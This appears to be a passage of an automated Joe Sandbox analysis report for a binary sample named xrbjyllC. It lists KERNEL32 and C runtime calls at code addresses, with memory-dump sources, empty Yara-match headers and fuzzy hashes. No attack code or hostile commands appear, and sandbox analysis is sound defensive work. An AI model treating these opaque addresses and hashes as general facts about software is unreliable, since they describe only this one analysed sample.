                                                                                              • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                                                              • _malloc.LIBCMT ref: 0041718A
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                                                              • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                                                              • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                                                              • _malloc.LIBCMT ref: 0041724C
                                                                                              • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                                                              • __freea.LIBCMT ref: 004172A4
                                                                                              • __freea.LIBCMT ref: 004172AD
                                                                                              • ___ansicp.LIBCMT ref: 004172DE
                                                                                              • ___convertcp.LIBCMT ref: 00417309
                                                                                              • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                                                              • _malloc.LIBCMT ref: 00417362
                                                                                              • _memset.LIBCMT ref: 00417384
                                                                                              • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                                                              • ___convertcp.LIBCMT ref: 004173BA
                                                                                              • __freea.LIBCMT ref: 004173CF
                                                                                              • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000001.1826572703.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000445000.00000040.00000001.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_1_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                                              • String ID:
                                                                                              • API String ID: 3809854901-0
                                                                                              • Opcode ID: 3d09e5343aa18fab3ca4e2e74db44cf1cccdb49efdd84c094ede33f31d65ba6e
                                                                                              • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                                                              • Opcode Fuzzy Hash: 3d09e5343aa18fab3ca4e2e74db44cf1cccdb49efdd84c094ede33f31d65ba6e
                                                                                              • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                                                              APIs
                                                                                              • _malloc.LIBCMT ref: 004057DE
                                                                                                • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                              • _malloc.LIBCMT ref: 00405842
                                                                                              • _malloc.LIBCMT ref: 00405906
                                                                                              • _malloc.LIBCMT ref: 00405930
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000001.1826572703.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000445000.00000040.00000001.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_1_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _malloc$AllocateHeap
                                                                                              • String ID: 1.2.3
                                                                                              • API String ID: 680241177-2310465506
                                                                                              • Opcode ID: 1371ffb49ce3b8dee1113081a69af0fad64233f45308895947edc3c59a7df708
                                                                                              • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                                                                                              • Opcode Fuzzy Hash: 1371ffb49ce3b8dee1113081a69af0fad64233f45308895947edc3c59a7df708
                                                                                              • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000001.1826572703.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000445000.00000040.00000001.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_1_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                              • String ID:
                                                                                              • API String ID: 3886058894-0
                                                                                              • Opcode ID: bd76f0579c09bb0a6f952e3feb4c94488d7cfab1bd6474dd60967b9cc6db7677
                                                                                              • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                                                              • Opcode Fuzzy Hash: bd76f0579c09bb0a6f952e3feb4c94488d7cfab1bd6474dd60967b9cc6db7677
                                                                                              • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                                                              APIs
                                                                                              • EntryPoint.XRBJYLLC(80070057), ref: 004017EE
                                                                                                • Part of subcall function 00401030: RaiseException.KERNEL32(-0000000113D97C15,00000001,00000000,00000000,00000015,2C2D8410), ref: 0040101C
                                                                                                • Part of subcall function 00401030: GetLastError.KERNEL32 ref: 00401030
                                                                                              • EntryPoint.XRBJYLLC(80070057), ref: 00401800
                                                                                              • EntryPoint.XRBJYLLC(80070057), ref: 00401813
                                                                                              • __recalloc.LIBCMT ref: 00401828
                                                                                              • EntryPoint.XRBJYLLC(8007000E), ref: 00401839
                                                                                              • EntryPoint.XRBJYLLC(8007000E), ref: 00401853
                                                                                              • _calloc.LIBCMT ref: 00401861
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000001.1826572703.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000445000.00000040.00000001.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_1_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: EntryPoint$ErrorExceptionLastRaise__recalloc_calloc
                                                                                              • String ID:
                                                                                              • API String ID: 1721462702-0
                                                                                              • Opcode ID: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
                                                                                              • Instruction ID: 9b44c07ae4757e317c030d83b628f3e382e80143504443e1f3b2735d650bea0f
                                                                                              • Opcode Fuzzy Hash: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
                                                                                              • Instruction Fuzzy Hash: AC018872500241EACA21BA229C06F1B7294DF90799F24893FF4C5762E2D63D9990D6EE
                                                                                              APIs
                                                                                              • __getptd.LIBCMT ref: 00414744
                                                                                                • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                              • __getptd.LIBCMT ref: 0041475B
                                                                                              • __amsg_exit.LIBCMT ref: 00414769
                                                                                              • __lock.LIBCMT ref: 00414779
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000001.1826572703.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000445000.00000040.00000001.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_1_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                              • String ID: @.B
                                                                                              • API String ID: 3521780317-470711618
                                                                                              • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                              • Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
                                                                                              • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                              • Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
                                                                                              APIs
                                                                                              • __lock_file.LIBCMT ref: 0040C6C8
                                                                                              • __fileno.LIBCMT ref: 0040C6D6
                                                                                              • __fileno.LIBCMT ref: 0040C6E2
                                                                                              • __fileno.LIBCMT ref: 0040C6EE
                                                                                              • __fileno.LIBCMT ref: 0040C6FE
                                                                                                • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000001.1826572703.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000445000.00000040.00000001.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_1_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                                                              • String ID:
                                                                                              • API String ID: 2805327698-0
                                                                                              • Opcode ID: 0562b983a982954f07d72bd2f01eb344b0d1ff129a9d588568d63b7b4b77f5f9
                                                                                              • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
                                                                                              • Opcode Fuzzy Hash: 0562b983a982954f07d72bd2f01eb344b0d1ff129a9d588568d63b7b4b77f5f9
                                                                                              • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
                                                                                              APIs
                                                                                              • __getptd.LIBCMT ref: 00413FD8
                                                                                                • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                              • __amsg_exit.LIBCMT ref: 00413FF8
                                                                                              • __lock.LIBCMT ref: 00414008
                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 00414025
                                                                                              • InterlockedIncrement.KERNEL32(00422910), ref: 00414050
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000001.1826572703.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000445000.00000040.00000001.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_1_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                              • String ID:
                                                                                              • API String ID: 4271482742-0
                                                                                              • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                              • Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
                                                                                              • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                              • Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
APIs
• GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
• GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
Strings
Memory Dump Source
• Source File: 0000000B.00000001.1826572703.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000001.1826572703.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000B.00000001.1826572703.0000000000445000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_1_400000_xrbjyllC.jbxd
Yara matches
Similarity
• API ID: AddressHandleModuleProc
• String ID: IsProcessorFeaturePresent$KERNEL32
• API String ID: 1646373207-3105848591
• Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
• Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
• Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
• Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
APIs
• __fileno.LIBCMT ref: 0040C77C
• __locking.LIBCMT ref: 0040C791
  • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
  • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
Memory Dump Source
• Source File: 0000000B.00000001.1826572703.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000001.1826572703.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000B.00000001.1826572703.0000000000445000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_1_400000_xrbjyllC.jbxd
Yara matches
Similarity
• API ID: __decode_pointer__fileno__getptd_noexit__locking
• String ID:
• API String ID: 2395185920-0
• Opcode ID: 0afeae9b27a86c2abe0b3397de8921379debd9150d07dd18b85413c6fc1de43d
• Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
• Opcode Fuzzy Hash: 0afeae9b27a86c2abe0b3397de8921379debd9150d07dd18b85413c6fc1de43d
• Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
APIs
Memory Dump Source
• Source File: 0000000B.00000001.1826572703.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000001.1826572703.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000B.00000001.1826572703.0000000000445000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_1_400000_xrbjyllC.jbxd
Yara matches
Similarity
• API ID: _fseek_malloc_memset
• String ID:
• API String ID: 208892515-0
• Opcode ID: 6f84d9cc9673cc99cf3f73f605a11d8361332ed7cabd46e1548c12b7ae2e097d
• Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
• Opcode Fuzzy Hash: 6f84d9cc9673cc99cf3f73f605a11d8361332ed7cabd46e1548c12b7ae2e097d
• Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
• __isleadbyte_l.LIBCMT ref: 00415307
• MultiByteToWideChar.KERNEL32(00000080,00000009,00000083,?,?,00000000,?,?,?), ref: 00415338
• MultiByteToWideChar.KERNEL32(00000080,00000009,00000083,00000001,?,00000000,?,?,?), ref: 004153A6
Memory Dump Source
• Source File: 0000000B.00000001.1826572703.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000001.1826572703.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000B.00000001.1826572703.0000000000445000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_1_400000_xrbjyllC.jbxd
Yara matches
Similarity
• API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
• String ID:
• API String ID: 3058430110-0
• Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
• Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
• Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
• Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
APIs
Memory Dump Source
• Source File: 0000000B.00000001.1826572703.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000001.1826572703.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000B.00000001.1826572703.0000000000445000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_1_400000_xrbjyllC.jbxd
Yara matches
Similarity
• API ID: __cftoe_l__cftof_l__cftog_l__fltout2
• String ID:
• API String ID: 3016257755-0
• Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
• Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
• Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
• Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89